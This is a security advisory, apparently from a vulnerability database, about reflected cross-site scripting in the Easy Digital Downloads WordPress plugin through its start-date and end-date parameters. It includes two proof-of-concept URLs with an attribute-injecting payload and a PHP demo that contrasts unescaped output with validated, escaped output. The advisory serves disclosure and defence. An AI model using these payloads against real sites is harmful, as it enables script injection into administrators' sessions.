The plugin does not escape the start-date and end-date parameters in the payment history dashboard before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&start-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&end-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
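The flaw and its fix in miniature, as an added example that is not the plugin's own code. The field markup, the YYYY-MM-DD date format and the function names are assumptions, and the esc_attr() fallback only stands in for the WordPress core function when the script runs outside WordPress.

```php
<?php
// Added illustration; hypothetical markup and function names, not plugin source.
// Stand-in so the script runs outside WordPress, where core provides esc_attr().
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Pattern the advisory describes: request value placed in an attribute unescaped.
function render_date_field_unsafe(string $name, array $query): string {
    $value = $query[$name] ?? '';
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened: accept only a plain date (assumed YYYY-MM-DD), then escape for
// attribute context regardless, so output stays safe if validation changes.
function render_date_field_safe(string $name, array $query): string {
    $value = $query[$name] ?? '';
    if (!is_string($value) || !preg_match('/\A\d{4}-\d{2}-\d{2}\z/', $value)) {
        $value = '';
    }
    return '<input type="text" name="' . esc_attr($name) . '" value="' . esc_attr($value) . '" />';
}

// Lists the attribute names an HTML parser sees on the rendered <input>.
function input_attribute_names(string $html): array {
    libxml_use_internal_errors(true); // malformed markup is expected here
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// Constructed request data: the advisory's start-date value after URL decoding,
// plus a well-formed end-date.
$query = [
    'start-date' => '" style=animation-name:rotation onanimationstart=alert(/XSS/)//',
    'end-date'   => '2021-09-01',
];

foreach (['start-date', 'end-date'] as $field) {
    $unsafe = implode(',', input_attribute_names(render_date_field_unsafe($field, $query)));
    $safe   = implode(',', input_attribute_names(render_date_field_safe($field, $query)));
    echo "$field\n  unsafe attributes: $unsafe\n  safe attributes:   $safe\n";
}
```

Any attribute name listed for the unsafe rendering beyond type, name and value came from the request parameter rather than from the template.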
| CPE | Name | Operator | Version |
|---|---|---|---|
| | easy-digital-downloads | lt | 2.11.2.1 |